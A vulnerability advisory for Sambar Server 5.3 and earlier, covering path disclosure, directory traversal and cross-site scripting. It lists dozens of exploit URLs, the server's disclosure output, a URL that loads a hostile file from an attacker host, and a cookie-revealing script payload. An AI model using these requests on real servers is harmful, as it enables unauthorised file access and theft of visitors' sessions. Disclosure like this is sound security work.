SCSA012.txt

`________________________________________________________________________  
  
Security Corporation Security Advisory [SCSA-012]  
________________________________________________________________________  
  
PROGRAM: Sambar Server  
HOMEPAGE: http://www.sambar.com/  
VULNERABLE VERSIONS: 5.3 and prior  
________________________________________________________________________  
  
  
DESCRIPTION  
________________________________________________________________________  
  
"Sambar Server is the new standard in high performance multi-functional  
servers with features rivaling other commercial products selling  
separately for several hundreds of dollars. It's Winsock2 compliant Win32  
integration functions on Windows 95, Windows 98, Windows NT, Win2000,  
and XP as a service or as an application."  
(direct quote from http://sambar.jalyn.net)  
  
  
DETAILS & EXPLOITS  
________________________________________________________________________  
  
  
¤ Path Disclosure :  
  
Sambar default's installation of the CGI bin directory contains  
a testcgi.exe and a environ.pl that allows remote users to view  
information regarding the operating system and  
web server's directory.  
  
These vulnerabilities can be triggered by a remote user submitting  
a specially crafted HTTP request.  
  
  
- Exploits :  
  
http://[target]/cgi-bin/environ.pl  
  
http://[target]/cgi-bin/testcgi.exe  
  
  
Will produce the following output:  
  
- environ.pl :  
--------------  
  
Sambar Server CGI Environment Variables  
GATEWAY_INTERFACE: CGI/1.1  
PATH_INFO:  
PATH_TRANSLATED: C:/sambar53/cgi-bin/environ.pl  
QUERY_STRING:  
REMOTE_ADDR: 127.0.0.1  
REMOTE_HOST:  
REMOTE_USER:  
REQUEST_METHOD: GET  
DOCUMENT_NAME: environ.pl  
DOCUMENT_URI: /cgi-bin/environ.pl  
SCRIPT_NAME: /cgi-bin/environ.pl  
SCRIPT_FILENAME: C:/sambar53/cgi-bin/environ.pl  
SERVER_NAME: localhost  
SERVER_PORT: 80  
SERVER_PROTOCOL: HTTP/1.1  
SERVER_SOFTWARE: SAMBAR  
CONTENT_LENGTH: 0  
CONTENT:  
  
  
- testcgi.exe :  
---------------  
  
Test CGI ... Version 1.00 [ build date 8-03-97 ]  
  
QUERY_STRING  
PATH_INFO  
PATH_TRANSLATED C:/sambar53/cgi-bin/testcgi.exe  
SCRIPT_NAME /cgi-bin/testcgi.exe  
SCRIPT_FILENAME C:/sambar53/cgi-bin/testcgi.exe  
DOCUMENT_ROOT C:/sambar53/docs/  
HTTP_USER_AGENT Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)  
REMOTE_ADDR 127.0.0.1  
REMOTE_HOST  
SERVER_NAME localhost  
SERVER_PROTOCOL HTTP/1.1  
SERVER_SOFTWARE SAMBAR  
CONTENT_TYPE  
  
----------------------------  
  
  
¤ Directory Disclosure :  
  
Other security vulnerabilities was found in Sambar which allow an  
attacker to reveal the content of the files and the directories  
on the web server, even if it should not be revealed.  
  
These vulnerabilities can be simply exploited by requesting a  
specially crafted URL utilizing iecreate.stm and ieedit.stm  
application with a '../' appended.  
  
- Exploits :  
  
http://[target]/sysuser/docmgr/iecreate.stm?template=../  
  
http://[target]/sysuser/docmgr/ieedit.stm?url=../  
  
  
----------------------------  
  
  
¤ Cross Site Scripting :  
  
Many exploitable bugs was found on Sambar Server which cause script  
execution on client's computer by following a crafted url.  
  
This kind of attack known as "Cross-Site Scripting Vulnerability" is  
present in many section of the web site, an attacker can input  
specially crafted links and/or other malicious scripts.  
  
- Exploits :  
  
http://[target]/netutils/ipdata.stm?ipaddr=[hostile_code]  
  
http://[target]/netutils/whodata.stm?sitename=[hostile_code]  
  
http://[target]/netutils/findata.stm?user=[hostile_code]  
  
http://[target]/netutils/findata.stm?host=[hostile_code]  
  
http://[target]/isapi/testisa.dll?check1=[hostile_code]  
  
http://[target]/cgi-bin/environ.pl?param1=[hostile_code]  
  
http://[target]/samples/search.dll?query=[hostile_code]&logic=AND  
  
http://[target]/wwwping/index.stm?wwwsite=[hostile_code]  
  
http://[target]/syshelp/stmex.stm?foo=[hostile_code]&bar=456  
  
http://[target]/syshelp/stmex.stm?foo=123&bar=[hostile_code]  
  
http://[target]/syshelp/cscript/showfunc.stm?func=[hostile_code]  
  
http://[target]/syshelp/cscript/showfncs.stm?pkg=[hostile_code]  
  
http://[target]/syshelp/cscript/showfnc.stm?pkg=[hostile_code]  
  
http://[target]/sysuser/docmgr/ieedit.stm?path=[hostile_code]  
  
http://[target]/sysuser/docmgr/ieedit.stm?name=[hostile_code]  
  
http://[target]/sysuser/docmgr/edit.stm?path=[hostile_code]  
  
http://[target]/sysuser/docmgr/edit.stm?name=[hostile_code]  
  
http://[target]/sysuser/docmgr/iecreate.stm?path=[hostile_code]  
  
http://[target]/sysuser/docmgr/create.stm?path=[hostile_code]  
  
http://[target]/sysuser/docmgr/info.stm?path=[hostile_code]  
  
http://[target]/sysuser/docmgr/info.stm?name=[hostile_code]  
  
http://[target]/sysuser/docmgr/ftp.stm?path=[hostile_code]  
  
http://[target]/sysuser/docmgr/htaccess.stm?path=[hostile_code]  
  
http://[target]/sysuser/docmgr/mkdir.stm?path=[hostile_code]  
  
http://[target]/sysuser/docmgr/rename.stm?path=[hostile_code]  
  
http://[target]/sysuser/docmgr/rename.stm?name=[hostile_code]  
  
http://[target]/sysuser/docmgr/search.stm?path=[hostile_code]  
  
http://[target]/sysuser/docmgr/search.stm?query=[hostile_code]  
  
http://[target]/sysuser/docmgr/sendmail.stm?path=[hostile_code]  
  
http://[target]/sysuser/docmgr/sendmail.stm?name=[hostile_code]  
  
http://[target]/sysuser/docmgr/template.stm?path=[hostile_code]  
  
http://[target]/sysuser/docmgr/update.stm?path=[hostile_code]  
  
http://[target]/sysuser/docmgr/update.stm?name=[hostile_code]  
  
http://[target]/sysuser/docmgr/vccheckin.stm?path=[hostile_code]  
  
http://[target]/sysuser/docmgr/vccheckin.stm?name=[hostile_code]  
  
http://[target]/sysuser/docmgr/vccreate.stm?path=[hostile_code]  
  
http://[target]/sysuser/docmgr/vccreate.stm?name=[hostile_code]  
  
http://[target]/sysuser/docmgr/vchist.stm?path=[hostile_code]  
  
http://[target]/sysuser/docmgr/vchist.stm?name=[hostile_code]  
  
http://[target]/cgi-bin/testcgi.exe?[hostile_code]  
  
  
- An other Cross Site Scripting can be exploited with a  
remote file where's include the hostile code like this :  
  
http://[target]/sysuser/docmgr/ieedit.stm?url=http://[attacker]/hostile_file  
.htm  
  
  
The hostile code could be :  
  
[script]alert("Cookie="+document.cookie)[/script]  
  
(open a window with the cookie of the visitor.)  
  
(replace [] by <>)  
  
  
SOLUTIONS  
________________________________________________________________________  
  
No solution for the moment.  
  
  
VENDOR STATUS  
________________________________________________________________________  
  
The vendor has reportedly been notified.  
  
  
LINKS  
________________________________________________________________________  
  
- http://www.security-corp.org/index.php?ink=4-15-1  
  
- Version Française :  
http://www.security-corporation.com/index.php?id=advisories&a=012-FR  
  
  
------------------------------------------------------------------------  
Grégory Le Bras aka GaLiaRePt | http://www.Security-Corporation.com  
------------------------------------------------------------------------  
  
  
  
  
  
`